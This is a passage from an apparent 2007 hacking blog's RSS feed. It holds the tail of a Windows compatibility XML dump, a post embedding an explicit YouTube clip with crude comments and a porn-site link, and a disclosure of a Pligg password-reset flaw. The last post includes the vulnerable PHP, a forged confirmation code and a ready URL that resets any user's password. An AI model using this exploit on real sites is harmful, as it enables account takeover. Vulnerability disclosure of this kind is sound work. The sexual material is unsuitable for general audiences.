    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;Safari.resources\en.lproj\SafariResources.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;2093056&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0xBBFE6551&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0 (522.11.3)&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;Safari Resources&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Apple Inc.&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;Safari&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.0 (522.11.3)&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;SafariResources.dll&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;Safari Resources&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;Copyright Apple Inc. 2006, 2007&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x4&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0x2052FD&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;3.522.11.3&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;3.0.0.0&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 18:03:34&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;06/10/2007 18:03:34&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/EXE<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;EXE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;kernel32.dll&quot;</span> <span style="color: #000066;">FILTER</span>=<span style="color: #ff0000;">&quot;GRABMI_FILTER_THISFILEONLY&quot;</span><span style="color: #000000; font-weight: bold;">&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;MATCHING_FILE</span> <span style="color: #000066;">NAME</span>=<span style="color: #ff0000;">&quot;kernel32.dll&quot;</span> <span style="color: #000066;">SIZE</span>=<span style="color: #ff0000;">&quot;985600&quot;</span> <span style="color: #000066;">CHECKSUM</span>=<span style="color: #ff0000;">&quot;0xE7E1F9DC&quot;</span> <span style="color: #000066;">BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;5.1.2600.2991&quot;</span> <span style="color: #000066;">BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;5.1.2600.2991&quot;</span> <span style="color: #000066;">PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;5.1.2600.2991&quot;</span> <span style="color: #000066;">FILE_DESCRIPTION</span>=<span style="color: #ff0000;">&quot;Windows NT BASE API Client DLL&quot;</span> <span style="color: #000066;">COMPANY_NAME</span>=<span style="color: #ff0000;">&quot;Microsoft Corporation&quot;</span> <span style="color: #000066;">PRODUCT_NAME</span>=<span style="color: #ff0000;">&quot;Microsoft® Windows® Operating System&quot;</span> <span style="color: #000066;">FILE_VERSION</span>=<span style="color: #ff0000;">&quot;5.1.2600.2991 (xpsp.060907-0105)&quot;</span> <span style="color: #000066;">ORIGINAL_FILENAME</span>=<span style="color: #ff0000;">&quot;kernel32&quot;</span> <span style="color: #000066;">INTERNAL_NAME</span>=<span style="color: #ff0000;">&quot;kernel32&quot;</span> <span style="color: #000066;">LEGAL_COPYRIGHT</span>=<span style="color: #ff0000;">&quot;© Microsoft Corporation. All rights reserved.&quot;</span> <span style="color: #000066;">VERFILEDATEHI</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEDATELO</span>=<span style="color: #ff0000;">&quot;0x0&quot;</span> <span style="color: #000066;">VERFILEOS</span>=<span style="color: #ff0000;">&quot;0x40004&quot;</span> <span style="color: #000066;">VERFILETYPE</span>=<span style="color: #ff0000;">&quot;0x2&quot;</span> <span style="color: #000066;">MODULE_TYPE</span>=<span style="color: #ff0000;">&quot;WIN32&quot;</span> <span style="color: #000066;">PE_CHECKSUM</span>=<span style="color: #ff0000;">&quot;0xF39C9&quot;</span> <span style="color: #000066;">LINKER_VERSION</span>=<span style="color: #ff0000;">&quot;0x50001&quot;</span> <span style="color: #000066;">UPTO_BIN_FILE_VERSION</span>=<span style="color: #ff0000;">&quot;5.1.2600.2991&quot;</span> <span style="color: #000066;">UPTO_BIN_PRODUCT_VERSION</span>=<span style="color: #ff0000;">&quot;5.1.2600.2991&quot;</span> <span style="color: #000066;">LINK_DATE</span>=<span style="color: #ff0000;">&quot;09/07/2006 11:59:20&quot;</span> <span style="color: #000066;">UPTO_LINK_DATE</span>=<span style="color: #ff0000;">&quot;09/07/2006 11:59:20&quot;</span> <span style="color: #000066;">VER_LANGUAGE</span>=<span style="color: #ff0000;">&quot;English (United States) [0x409]&quot;</span> <span style="color: #000000; font-weight: bold;">/&gt;</span></span>
<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/EXE<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/DATABASE<span style="color: #000000; font-weight: bold;">&gt;</span></span></span></pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://pufone.org/blog/safari-for-windows-quick-review/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>YouTube Porn &#8211; The seX Video</title>
		<link>http://pufone.org/blog/youtube-porn-the-sex-video/</link>
		<comments>http://pufone.org/blog/youtube-porn-the-sex-video/#comments</comments>
		<pubDate>Sat, 02 Jun 2007 14:55:57 +0000</pubDate>
		<dc:creator>Cugone</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://pufone.org/blog/youtube-porn-the-sex-video/</guid>
		<description><![CDATA[
Warning: The following material is sexually explicit.
Exit now if you are under 18 years old!
On their mission to take down 9/11 conspiracy videos, YouTube forgot to erase this pornographic video. At the time of this post, the clip made it to the YouTube most popular list on page 4 with 16,385 views. Should YouTube expect [...]]]></description>
			<content:encoded><![CDATA[<p align="center"><img src="http://pufone.org/blog/wp-content/uploads/2007/06/pic_youtubelogo_123x63.gif" alt="YouTube Logo" /><br />
<strong>Warning:</strong> The following material is sexually explicit.<br />
<a href="http://www.youtube.com/" rel="external nofollow">Exit</a> now if you are under 18 years old!</p>
<p>On their mission to take down <a href="http://youtube.com/watch?v=X9xh7bPfk-U" target="_blank" rel="external nofollow" title="(YouTube) 9/11 Coincidences (Part Eleven) UPDATE">9/11 conspiracy</a> videos, YouTube forgot to erase <a href="http://youtube.com/watch?v=DNmT2IGTAGI" target="_blank" rel="external nofollow" title="(YouTube) seX">this pornographic video</a>. At the time of this post, the clip made it to the YouTube most popular list on page 4 with 16,385 views. Should YouTube expect a <span id="more-44"></span> lawsuit? Likely!</p>
<p align="center">Proof:<br />
<a href="http://pufone.org/blog/wp-content/uploads/2007/06/youtube-porn-1280x800.png" title="seX Video on YouTube"><img src="http://pufone.org/blog/wp-content/uploads/2007/06/youtube-porn-1280x800.thumbnail.png" alt="seX Video on YouTube" /></a> <a href="http://pufone.org/blog/wp-content/uploads/2007/06/youtube_mp_porn_1280x800.png" title="Most Polular Youtube"><img src="http://pufone.org/blog/wp-content/uploads/2007/06/youtube_mp_porn_1280x800.thumbnail.png" alt="Most Polular Youtube" /></a></p>
<p align="center">And the actual 14 seconds video:</p>
<div align="center"><embed src="http://pufone.org/mediaplayer.swf" width="320" height="240" allowfullscreen="true" flashvars="&#038;displayheight=240&#038;file=http://pufone.org/blog/wp-content/uploads/2007/06/youtube-porn-video.flv&#038;height=240&#038;image=http://pufone.org/blog/wp-content/uploads/2007/06/youtube-porn-video-thumbnail2.jpg&#038;width=320&#038;location=http://pufone.org/mediaplayer.swf" /></div>
<p><strong>Update:</strong> The comments of the YouTube porn video <a href="http://www.youtube.com/comment_servlet?all_comments&#038;v=DNmT2IGTAGI" rel="nofollow" target="_blank" title="Comments of the porno video on YouTube.com">haven&#8217;t been erased from YouTube.com</a><br />
Some funny comments on the video from youtube:</p>
<ul>
<li><a href="http://www.youtube.com/user/SolidGold1980" target="_blank" rel="external nofollow">SolidGold1980</a>:<br />
	 I&#8217;M GONNA SUE&#8230;right after I&#8217;m done jacking off to this&#8230; </li>
<ul>
<li><a href="http://www.youtube.com/user/surgewakefield" target="_blank" rel="external nofollow">surgewakefield</a>:<br />
		that would make you an accomplice, so you wouldn&#8217;t win. </li>
</ul>
<li><a href="http://www.youtube.com/user/snazzyprintgirl" target="_blank" rel="external nofollow">snazzyprintgirl</a>:<br />
	i reported this , son was 8 year old son was looking at this.</li>
<ul>
<li><a href="http://www.youtube.com/user/pauldonald" target="_blank" rel="external nofollow">pauldonald</a>:<br />
		have u even seen ur own videos?</li>
</ul>
<li><a href="http://www.youtube.com/user/GabrielGZNH" target="_blank" rel="external nofollow">GabrielGZNH</a><br />
	keep this up&#8230; No one should want to be the prude responsible for getting this video taken down&#8230;. </li>
<ul>
<li><a href="http://www.youtube.com/user/surgewakefield" target="_blank" rel="external nofollow">surgewakefield</a><br />
		Sorry, I flagged it. After 10 minutes it just got boring</li>
<li><a href="http://www.youtube.com/user/fr3d420" target="_blank" rel="external nofollow">fr3d420</a><br />
		its only 14 seconds o_O </li>
<li><a href="http://www.youtube.com/user/arabonormanno" target="_blank" rel="external nofollow">arabonormanno</a><br />
		Lol&#8230;this simply implies that &#8220;surgewakefield&#8221; has been watching this video about 40 times (10*60/14=42.85), before getting bored and flagging it&#8230;ahaahahah hahaha </li>
<li><a href="http://www.youtube.com/user/surgewakefield" target="_blank" rel="external nofollow">surgewakefield</a><br />
		oh you&#8217;re allowed to watch a video more than once. O_o </li>
<li><a href="http://www.youtube.com/user/fr3d420" target="_blank" rel="external nofollow">fr3d420</a><br />
		lol</li>
</ul>
<li><a href="http://www.youtube.com/user/surgewakefield" target="_blank" rel="external nofollow">surgewakefield</a>:<br />
	Simply Amazing! RON PAUL for President!</li>
</ul>
<p align="center">Some of you guys asked me for <a href="http://www.pornobo.com/">more porn videos</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://pufone.org/blog/youtube-porn-the-sex-video/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Hacking Pligg 9.5 beta &#8211; Exploit</title>
		<link>http://pufone.org/blog/hacking-pligg-95-beta-exploit/</link>
		<comments>http://pufone.org/blog/hacking-pligg-95-beta-exploit/#comments</comments>
		<pubDate>Sun, 27 May 2007 11:15:26 +0000</pubDate>
		<dc:creator>Cugone</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://pufone.org/blog/hacking-pligg-95-beta-exploit/</guid>
		<description><![CDATA[Pligg is a Social Bookmarking Web 2.0 Content Management System based on the popular social news website Digg.com
A security flaw makes it possible to change the password of any user and log in.
VideoSift is Hacked! VideoSift is one of the largest (still small) websites that uses Pligg.
 
How it works:
To reinitialize a forgotten password, Pligg [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://pligg.com" title="Pligg Website" target="_blank" rel="external nofollow"><img src="http://pufone.org/blog/wp-content/uploads/2007/05/pligg.gif" alt="Pligg" />Pligg</a> is a Social Bookmarking Web 2.0 Content Management System based on the popular social news website <strong>Digg.com</strong></p>
<p>A security flaw makes it possible to change the password of <strong>any</strong> user and log in.</p>
<p><strike><a href="http://www.videosift.com" target="_blank" rel="external nofollow" title="VideoSift Website">VideoSift</a> is Hacked!</strike> <a href="http://www.videosift.com" target="_blank" rel="external nofollow" title="VideoSift Website">VideoSift</a> is one of the largest (still small) websites that uses Pligg.</p>
<p style="text-align: center"><a href="http://pufone.org/blog/hacking-pligg-95-beta-exploit/videosift-admin-charter/" rel="attachment wp-att-37" title="Admin Charter - VideoSift" target="_blank"><img src="http://pufone.org/blog/wp-content/uploads/2007/05/videosift-amin-charter.thumbnail.png" alt="Admin Charter - VideoSift" /></a> <a href="http://pufone.org/blog/hacking-pligg-95-beta-exploit/changing-gods-password/" target="_blank" rel="attachment wp-att-38" title="Changing God’s Password - VideoSift"><img src="http://pufone.org/blog/wp-content/uploads/2007/05/changing-god-password.thumbnail.png" alt="Changing God’s Password - VideoSift" /></a></p>
<p>How it works:<br />
To reinitialize a forgotten password, Pligg follows a classical process. A confirmation code is generated and sent by email to the concerned user mail box. The user has to follow the link containing the confirmation code and if the confirmation code is checked successfully, the password is reinitialized to a pre-defined value.</p>
<p>you can find a part of the source code in charge of this check below :</p>
<p>pligg_dir/libs/html1.php:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">function</span> generateHash<span style="color: #009900;">&#40;</span><span style="color: #000088;">$plainText</span><span style="color: #339933;">,</span> <span style="color: #000088;">$salt</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
  <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$salt</span> <span style="color: #339933;">===</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> 
    <span style="color: #000088;">$salt</span> <span style="color: #339933;">=</span> <span style="color: #990000;">substr</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">md5</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">uniqid</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">rand</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">,</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">,</span> SALT_LENGTH<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
  <span style="color: #009900;">&#125;</span>
  <span style="color: #b1b100;">else</span> <span style="color: #009900;">&#123;</span>
    <span style="color: #000088;">$salt</span> <span style="color: #339933;">=</span> <span style="color: #990000;">substr</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$salt</span><span style="color: #339933;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">,</span> SALT_LENGTH<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> 
  <span style="color: #009900;">&#125;</span>
  <span style="color: #b1b100;">return</span> <span style="color: #000088;">$salt</span> <span style="color: #339933;">.</span> <span style="color: #990000;">sha1</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$salt</span> <span style="color: #339933;">.</span> <span style="color: #000088;">$plainText</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></td></tr></table></div>

<p>pligg_dir/login.php :</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$confirmationcode</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$_GET</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">&quot;confirmationcode&quot;</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>generateHash<span style="color: #009900;">&#40;</span><span style="color: #000088;">$username</span><span style="color: #339933;">,</span> <span style="color: #990000;">substr</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$confirmationcode</span><span style="color: #339933;">,</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">,</span> SALT_LENGTH<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">==</span> <span style="color: #000088;">$confirmationcode</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
  <span style="color: #000088;">$db</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">query</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'UPDATE `'</span> <span style="color: #339933;">.</span> table_users <span style="color: #339933;">.</span> <span style="color: #0000ff;">'` SET `user_pass` = &quot;033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750&quot; WHERE `user_login`= &quot;'</span><span style="color: #339933;">.</span><span style="color: #000088;">$username</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'&quot;'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>

<p>Unfortunately you can easily generate, for a given username, a confirmation code that passes successfully the check on line 2 above.</p>
<p>Example:</p>
<p>salt = 123456789 and username = admin</p>
<p>we have:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #990000;">sha1</span><span style="color: #009900;">&#40;</span>123456789admin<span style="color: #009900;">&#41;</span> <span style="color: #339933;">=</span> 1e2f566cbda0a9c855240bf21b8bae030404cad7</pre></div></div>

<p>and thus:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$confirmationcode</span> <span style="color: #339933;">=</span> 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7</pre></div></div>

<p>with the following URL you can reinitialize the user &#8220;admin&#8221; password:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.domain.com/login.php?processlogin=4&amp;username=admin&amp;confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7</pre></div></div>

<p><a href="http://forum.pligg.com" target="_blank" rel="external,nofollow">Pligg Forum</a> members have been notified about it via e-mail this morning. Most Pligg webmasters have&#8217;t signed up for the forum <img src='http://pufone.org/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> .<br />
<strong>All Pligg websites </strong>I tried were vulnerable to this exploit. There is no commercial value for me, so don&#8217;t worry, administrators have been notified that it&#8217;s time to <a href="http://forums.pligg.com/showthread.php?p=30108" target="_blank" rel="external nofollow" title="Pligg Exploit Patch">patch</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://pufone.org/blog/hacking-pligg-95-beta-exploit/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Page Caching using disk (enhanced) (user agent is rejected)
Database Caching 2/12 queries in 0.003 seconds using disk
Object Caching 357/374 objects using disk

Served from: pufone.org @ 2012-05-18 00:44:20 -->
